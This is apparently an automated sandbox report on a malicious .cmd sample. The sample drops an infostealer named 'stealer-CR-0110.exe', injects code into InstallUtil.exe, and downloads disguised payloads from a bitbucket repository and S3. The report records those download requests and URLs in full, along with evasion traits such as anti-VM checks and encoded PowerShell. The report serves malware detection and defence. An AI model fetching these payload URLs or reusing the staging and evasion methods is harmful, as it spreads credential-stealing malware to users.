Windows Analysis Report
849128312.cmd

Overview

General Information

Sample name: 849128312.cmd
Analysis ID: 1532433
MD5: e5ca9d51a4b6e15d0dc86815068d1dd3
SHA1: 1844bf3c0f506e919ed1100e71dcb57c0a68201e
SHA256: 9dc121c5c9a9a1771a52101a2c664c622b23dfd1ad31ce6c1e92c902bebdb248
Tags: cmd, user-01Xyris

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Avira: detection malicious, Label: HEUR/AGEN.1351837
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Virustotal: Detection: 63%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 54.231.171.137:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.5.27.130:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.5.27.130:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb9 source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbH source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: n.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006711000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2224438229.0000000009270000.00000004.08000000.00040000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ((.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\InstallUtil.pdbH source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: usymbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb\h source: InstallUtil.exe, 0000000D.00000002.4545766049.0000000004F99000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006711000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2224438229.0000000009270000.00000004.08000000.00040000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb*C source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb2 source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4570717346.0000000005C44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdbz source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\InstallUtil.pdb'9 source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\InstallUtil.pdbn source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb.NETFrameworkv4.0.30319InstallUtil.exe source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdbc source: InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbKj source: InstallUtil.exe, 0000000D.00000002.4545766049.0000000004F99000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDBl source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C44000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbBC source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powershell.pdbUGP source: 849128312.cmd.Fjz, 00000007.00000000.2063200519.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, 849128312.cmd.Fjz.4.dr
Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb8W source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: powershell.pdb source: 849128312.cmd.Fjz, 00000007.00000000.2063200519.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, 849128312.cmd.Fjz.4.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdb? source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 7_2_08E3F54C
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 7_2_08E3F550
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 4x nop then jmp 08E3ADD0h 7_2_08E3AD10
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 4x nop then jmp 08E3ADD0h 7_2_08E3AD18
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 8_2_02642435
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 8_2_0264243C
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 4x nop then jmp 05D63358h 8_2_05D62FC8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 4x nop then jmp 05D63358h 8_2_05D62FBA
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 4x nop then jmp 05D6B3F0h 8_2_05D6B330
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 4x nop then jmp 05D6B3F0h 8_2_05D6B338
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 8_2_05D6FAB0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 8_2_05D6FAA8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 4x nop then jmp 05D90E3Fh 8_2_05D90DAA
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 4x nop then jmp 05D90E3Fh 8_2_05D90CB8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 4x nop then jmp 05D90E3Fh 8_2_05D90CA8

Networking

Source: Network traffic Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 54.231.171.137:443 -> 192.168.2.5:49706
Source: Network traffic Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 54.231.171.137:443 -> 192.168.2.5:49706
Source: Network traffic Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 3.5.27.130:443 -> 192.168.2.5:49710
Source: Network traffic Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 3.5.27.130:443 -> 192.168.2.5:49710
Source: Network traffic Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 3.5.27.130:443 -> 192.168.2.5:49709
Source: Network traffic Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 3.5.27.130:443 -> 192.168.2.5:49709
Source: Yara match File source: 7.2.849128312.cmd.Fjz.52f8430.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.stealer-CR-0110.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.849128312.cmd.Fjz.5378024.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.849128312.cmd.Fjz.53821fc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.849128312.cmd.Fjz.4e17544.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.849128312.cmd.Fjz.53025fc.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe, type: DROPPED
Source: global traffic HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Llbodzuyqnk.wav HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Llbodzuyqnk.wav HTTP/1.1Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/ad174d1e-b961-479d-95c3-d6de93f73ae8/Llbodzuyqnk.wav?response-content-disposition=attachment%3B%20filename%3D%22Llbodzuyqnk.wav%22&AWSAccessKeyId=ASIA6KOSE3BNI2FYFJS5&Signature=iHriFimLoltXdt5jxd9L4iNbvFk%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEF4aCXVzLWVhc3QtMSJHMEUCIQCf%2BiTBGoOb2%2FoSbo29PHijrNyTDWHeuoyFbJadJVb9wAIgS3Pt4G0c1jqGkwCwSO1mbhZlcjS9NRDtPBsZ%2BcC7n8YqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDATYITCcujwDUeM9ViqEArxZnpRlcxAbGJscSY15XkLPDxtggx1vwxhjHt0NQhSZB5XRuZ8k9rCO9Tu3AVOwZvCF3FGaai7E9BtFdD6f7b%2B6nDUz5461DuFA8IoR%2BBJoS74vostzPHD9LVhTzzbJpesAYaOyNAhSMMG53vaEa0suSSIDddaMf57foW3R%2BuhHGt5V0IQGqDe68Stt6m6HnDihHDQdXKPx4qVQfKHpX9FHo7VAmtDXE50K2WemvrMe%2BcEf97cH4wcg%2FQyRaNkDvSGkMGJEXbxNIOBKlLYG2gDS8b9XJ4vu08n7DOi%2FE%2B9Lj%2BxtuLQXibeswsoQ6kxoOwWASrDOYGEXcOHvDOrDbgJ0Ogs9MNyurbgGOp0Bitz4Ty9PFWwjYC4fwyQ%2FuWalhv%2F4xhiZYGsaxi%2B7S9X5XyEJoiNoWnrwR%2F90hmXbpLnnxAPPTDBIsFEzXlN5vCX0GzaR234%2BwdIrcCMX9%2Bt%2FDbCW8e19US7mkjuHLpVxz4Mu%2Bl9bbNbUOSX5LtLVSHOGZ2MUbODnugftkxQ2hQr%2FAlpqx2vQ7Av%2Fx5dweTJj1eWeoFNiKYXSAWqX6Q%3D%3D&Expires=1728798308 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Gqjmdstn.pdf HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Hgjcrxfnz.mp3 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/3e10a657-95f6-485a-b261-bddc3faeff6c/Hgjcrxfnz.mp3?response-content-disposition=attachment%3B%20filename%3D%22Hgjcrxfnz.mp3%22&AWSAccessKeyId=ASIA6KOSE3BNIEIP43DP&Signature=B5adOCQBGaXXStvtgXJrT%2FK011k%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEF4aCXVzLWVhc3QtMSJHMEUCIEKWj%2FjyJyUla4TUxj2qwDJeUpL8HAtTC9v2mxsTnr%2FtAiEAhX3oj6Xtqz7EgE9a8P5stTogLwKy2JdlhKi15IG8BZYqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDAFClDm68vTnYNr3GCqEApcGUDsrbHb6g7SkUBVzttzG23544pAb24muMUib8sEh4SMVlpf48ZeWA3DOIDSoeIwy3s0fXGwimVWr8HZ%2BpPpZYiQsLVffDmcpe3iR3yNr3FctMSfhkmhpEhGBNXpOvWCi7FYMWqvfdwS7BVP1xPP%2FOpati3cBm3AghhtQ7zP9x4%2BCqiyUIJaOB8vmh3SyDDWSoENBxPEjnNUACfIDTpfT1b6br9zUo5yBYoX9FkUwrtRyJ1RCpVvVyuSgU9xaAAm1VI4JWql9dfF9clDNIjFz2VYgEtCPpeYI%2BrltH6SGga5djb3oBTVPAYrlZuL3JyePjqvvSWm1dtyFE7cZ8jJj7ymZMOOurbgGOp0BhZnTNFhhGUWCfhkEEJcjLMbknDlN5Ia8oI6auJNYVbnSd3pVhcPRhn2XOfyMYfh2A81qE8FkFp67uzAr9GNOgBq4kI0URvRGnx9XyxxVe%2BByCrIrs8%2FQ%2Bj9Ns%2FZmTwD7UeyxBkd8v4%2FOWGcU5QTsYA7YPwyqUDjBCfybRPoT1d1rQhME0tQLVgfkpVt1UpQvNT1u4j1HfW6VohIpkw%3D%3D&Expires=1728798315 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b1e8acb6-ab61-4d48-9b47-4bc96cf59a21/Gqjmdstn.pdf?response-content-disposition=attachment%3B%20filename%3D%22Gqjmdstn.pdf%22&AWSAccessKeyId=ASIA6KOSE3BNNGREZMSF&Signature=v6ZxFBV4nL3oaCjj1qj3kdiRbnw%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEF4aCXVzLWVhc3QtMSJHMEUCIQDZG%2Fk6XI2yYOu2V0Utzpd0eIOAE7HVeOOT%2FWQy4YMOKAIgMa6sJ4%2BiMtC5KTu8k7z6l7nKIuFwY7qAWn2LWVEiC2wqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDPdE3wsOdxXVeiwi1yqEAm8JejVR0obvQzZTIMsidRXOtJskS%2BVEsymGex9hcbQefXJ3reUU40QJbwQBW5C420ningDWxPVNlpaPZapZR2BlLS9QkAtHgp8K6OH2fSduvDuArtzJuO4RwxZpsRBQhQnUbKRZZOTm%2FnA7mwNmtBV4QKGS8K2N%2FDeGbCL4nttii2NJyWIaZW%2F6dPRJRH8kFkKFOArzlPZqtRwHoEdqC%2Bm%2BYvYgXZKkNghuOv8TTnyhCInS9%2F6ppGYX92rTA7w7ebYAFSuWKnrGM6h2jbcbA17nBzCTddSDLv%2FOdA2ZtLpRSRTyJ5G49HYxR%2BM4iDqPM03geohF3N5%2Fa%2F7LVcAmG321KfxvMOOurbgGOp0BbR31EsB77Otm7dUE8SkWQ%2B7sYnhv7MVJXvkV5NTPgD8asf8VCMmDQu6beM2ybLz1%2BRcdPp3aRxLf1fobnyS6rN3M1Hnp611qVue%2BaHF9MWbLo%2B8n1dhiUj1uO7cj2pd20P4L%2BbbBaB8U6mLTpM0lqtIEw3nCOx4tsw6h6N66tp7DLpQawPIuNOaueiybJ%2FL3RUP8D9SWRN7bxWB%2BGw%3D%3D&Expires=1728798315 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 185.166.143.48 185.166.143.48
Source: Joe Sandbox View ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49705 -> 185.166.143.48:443
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: bitbucket.org
Source: global traffic DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004B71000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002831000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002E61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004B71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aui-cdn.atlassian.com/
Source: InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7F000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002876000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/3e10a657-95f6-
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004ED5000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/ad174d1e-b961-
Source: stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002876000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b1e8acb6-ab61-
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002831000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002E61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org
Source: stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002831000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/312351234123/12312312412adsada/downloads/Gqjmdstn.pdf
